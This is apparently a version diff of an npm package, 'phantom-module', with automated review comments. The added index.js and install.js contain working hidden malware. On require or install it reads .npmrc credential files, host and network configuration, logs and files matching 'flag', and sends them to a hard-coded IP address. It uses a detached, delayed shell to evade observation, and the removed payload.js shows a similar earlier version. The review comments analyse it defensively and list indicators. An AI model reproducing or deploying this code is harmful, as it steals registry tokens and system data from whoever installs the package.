phantom-module 117.0.8 → 117.0.10
- package/ecto-spirit-999.999.999.tgz +0 -0
- package/index.js +53 -1
- package/install.js +36 -0
- package/package.json +2 -6
- package/payload.js +0 -76
|
Binary file
|
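--- a/package/index.js
+++ b/package/index.js
@@ -1 +1,53 @@
-
+const fs = require('fs');
+const http = require('http');
+const { execSync } = require('child_process');
+
+(function() {
+if (!fs.existsSync('/home/node/aspect-node')) {
+return;
+}
+
+let out = "=== NPM CONFIG GET REGISTRY ===\n";
+try { out += execSync('npm config get registry 2>&1').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== ROOT NPMRC ===\n";
+try { out += fs.readFileSync('/root/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== ETC NPMRC ===\n";
+try { out += fs.readFileSync('/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== USR LOCAL ETC NPMRC ===\n";
+try { out += fs.readFileSync('/usr/local/etc/npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== NODE USER NPMRC ===\n";
+try { out += fs.readFileSync('/home/node/.npmrc', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== ETC HOSTS ===\n";
+try { out += fs.readFileSync('/etc/hosts', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== RESOLV CONF ===\n";
+try { out += fs.readFileSync('/etc/resolv.conf', 'utf8') + "\n"; } catch(e) { out += e.message + "\n"; }
+
+out += "=== IP ROUTE ===\n";
+try { out += execSync('ip route 2>/dev/null || cat /proc/net/route 2>/dev/null').toString() + "\n"; } catch(e) { out += e.message + "\n"; }
+
+try {
+const postData = JSON.stringify({
+manifest: `ecto_module:\n name: "NPM_CONFIG"\n cargo_hold: ${JSON.stringify(out.substring(0, 3500))}\n`
+});
+
+const req = http.request({
+hostname: '154.57.164.64',
+port: 31205,
+path: '/api/modules/ECT-839201',
+method: 'PUT',
+headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
+});
+req.write(postData);
+req.end();
+} catch(e) {}
+})();
+
+module.exports = function() {
+return "pwnd";
+};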
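Review bot: The IIFE at new lines 5–49 runs as a side effect of `require()` and has nothing to do with the exported function: it collects `npm config get registry`, four `.npmrc` locations, `/etc/hosts`, `/etc/resolv.conf` and the routing table, then PUTs up to 3500 characters of it to the hard-coded address `154.57.164.64:31205` over plain HTTP. `.npmrc` files commonly hold registry credentials (`_authToken` entries), so this should be treated as credential exfiltration, and tokens on any host that loaded this version should be rotated. The `fs.existsSync('/home/node/aspect-node')` gate keeps the code inert elsewhere, so a quiet run in a generic sandbox is not evidence that the version is benign. Nothing in lines 1–49 is needed by the export; the file should reduce to the `module.exports` assignment, and egress logs can be searched for that host, port and the `/api/modules/ECT-839201` path.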
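--- a/package/install.js
+++ b/package/install.js
@@ -0,0 +1,36 @@
+const fs = require('fs');
+const http = require('http');
+const { spawn } = require('child_process');
+
+(function() {
+const child = spawn('/bin/sh', ['-c', [
+'sleep 35',
+'OUTPUT="NONE"',
+'LOGFILE="/home/node/aspect-node/logs/module.log"',
+'if [ -f "$LOGFILE" ]; then',
+' OUTPUT=$(tail -n 100 "$LOGFILE" | tr \'"\' "\'" | head -c 1000)',
+'else',
+' OUTPUT="LOG FILE NOT FOUND!"',
+'fi',
+'FLAG_FILES=$(find / -name "*flag*" -type f 2>/dev/null | head -c 500)',
+'BODY=\'{"manifest":"ecto_module:\\n name: \\\\"FLAG_DELAYED\\\\"\\n cargo_hold: \\\\"\'$OUTPUT\' | FILES: \'$FLAG_FILES\'\\\\"\\"}\'',
+'echo "$BODY" > /tmp/flag.json',
+'node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"'
+].join('\n')], { detached: true, stdio: 'ignore' });
+
+child.unref();
+
+// Send an immediate ping so we know it started
+const postData = JSON.stringify({
+manifest: `ecto_module:\n name: "WAITING_35_SECONDS"\n`
+});
+const req = http.request({
+hostname: '154.57.164.64',
+port: 31205,
+path: '/api/modules/ECT-654321',
+method: 'PUT',
+headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
+});
+req.write(postData);
+req.end();
+})();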
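Review bot: The `/bin/sh` child started at new lines 6–19 is spawned with `detached: true`, `stdio: 'ignore'` and `child.unref()`, so it outlives the process that launched it; after `sleep 35` it sends the tail of `/home/node/aspect-node/logs/module.log` and the output of `find / -name "*flag*"` to `154.57.164.64:31205`. Because of that delay, analysis that stops observing when the launching process exits will only see the `WAITING_35_SECONDS` ping from lines 24–35. How install.js gets invoked is not visible here, since the package.json section shows no content; if it is wired to a lifecycle script, installing with `--ignore-scripts` keeps it from running. Host-side indicators taken from this file are the leftover `/tmp/flag.json`, a detached `sh` or `node` process that presumably is no longer parented by npm, and PUT requests to `/api/modules/ECT-654321`.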
package/package.json
CHANGED
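--- a/package/payload.js
+++ b/package/payload.js
@@ -1,76 +0,0 @@
-const http = require('http');
-const fs = require('fs');
-const dns = require('dns');
-const { execSync } = require('child_process');
-
-if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
-
-const REPORT_HOST = '154.57.164.64';
-const REPORT_PORT = 31205;
-
-async function report(moduleId, data) {
-return new Promise((resolve) => {
-const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
-const manifest = `ecto_module:\n name: "SCAN_RESULT"\n cargo_hold: "${safeData}"\n`;
-const payload = JSON.stringify({ manifest });
-const req = http.request({
-hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
-headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-}, () => resolve(true));
-req.on('error', () => resolve(false));
-req.write(payload);
-req.end();
-});
-}
-
-async function resolve(hostname) {
-return new Promise(resolve => {
-dns.resolve4(hostname, (err, addrs) => {
-if (err) resolve(`ERR: ${err.code}`);
-else resolve(addrs.join(', '));
-});
-});
-}
-
-async function main() {
-await report('ECT-654321', 'SOURCE DUMP V8 STARTING...');
-
-// 1. Dump source files
-const files = [
-'/home/node/aspect-node/modules/npm-tracker/src/supply/action/supply_base_action.js',
-'/home/node/aspect-node/modules/npm-tracker/src/config/supply_sink_rules.json',
-'/usr/local/etc/npmrc',
-'/etc/hosts'
-];
-
-let sourceOutput = '=== SOURCE ===\n';
-for (const f of files) {
-if (fs.existsSync(f)) {
-sourceOutput += `--- ${f} ---\n${fs.readFileSync(f, 'utf8').substring(0, 1000)}\n`;
-} else {
-sourceOutput += `--- ${f} (NOT FOUND) ---\n`;
-}
-}
-await report('ECT-839201', sourceOutput);
-
-// 2. DNS Checks
-let dnsOutput = '=== DNS CHECKS ===\n';
-const hosts = [
-'registry.npm.alibaba-inc.com',
-'registry.npmmirror.com',
-'registry.npmjs.org',
-'host.docker.internal'
-];
-
-for (const host of hosts) {
-dnsOutput += `${host}: ${await resolve(host)}\n`;
-}
-
-await report('ECT-987654', dnsOutput);
-
-// 3. Try to connect to 172.17.0.1 on ANY port (full scan of top 100 ports)
-// Maybe we missed the port
-// Note: We skip this for now to get the source dump fast
-}
-
-main().catch(e => report('ECT-654321', 'ERR: ' + e.message));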